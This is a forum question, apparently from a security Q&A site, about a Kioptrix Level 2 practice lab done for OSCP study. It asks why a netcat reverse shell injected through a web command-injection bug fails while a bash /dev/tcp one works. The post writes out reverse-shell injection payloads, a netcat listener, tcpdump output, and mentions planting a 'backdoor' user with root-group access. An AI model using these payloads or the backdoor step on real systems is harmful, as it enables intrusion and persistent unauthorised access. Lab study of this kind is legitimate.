0

I've completed kioptrix level 2 challenge via sql injection, command injection, bash reverse shell, and local privilege escalation as part of my OSCP preparation.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1

My question is why netcat reverse shell executed in web browser via command injection bug doesn't work when it was working just fine via terminal?

My Setup

Kali -  10.10.13.37
Kioptrix 2 - 10.10.13.254

netcat listerner

kali@kali:~$ nc -lp 4444

I've verified tcp port 4444 is open

kali@kali:~$ ss -antp | g 4444
LISTEN 0      1            0.0.0.0:4444         0.0.0.0:*     users:(("nc",pid=3003,fd=3)) 
kali@kali:~$

However, netcat reverse shell executed in web browser via command injection bug doesn't work

; nc 10.10.13.37 4444
; nc 10.10.13.37 4444 -e /bin/sh

No traffic at all

kali@kali:~$ sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes

However, when I repeat the same process with netcat executed on Kioptrix 2 terminal, I was able to get the reverse shell setup on Kali.

backdoor user used in this was created right after I getting root access via privilege escalation bug

[backdoor@kioptrix ~]$ nc 10.10.13.37 4444 -e /bin/sh

Reverse shell via terminal is working fine

kali@kali:~$ nc -lp 4444
id
uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor)

tcpdump traffic, the last 4 packets were for id command

kali@kali:~$ sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0
00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0
00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0

00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3
00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0
00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97
00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0
Wolf
  • 347
  • 2
  • 3
  • 15
  • 1
    Are you able to run other commands using that method? I assume you tried that bash /dev/tcp line and that didn't work either? – multithr3at3d May 26 '20 at 22:52
  • Normal Linux command works. The bash reverse shell actually was the solution. I can't help but wondering why normal nc reverse shell didn't work in this case. You can give it a try, link provided above. – Wolf May 27 '20 at 01:06

0 Answers0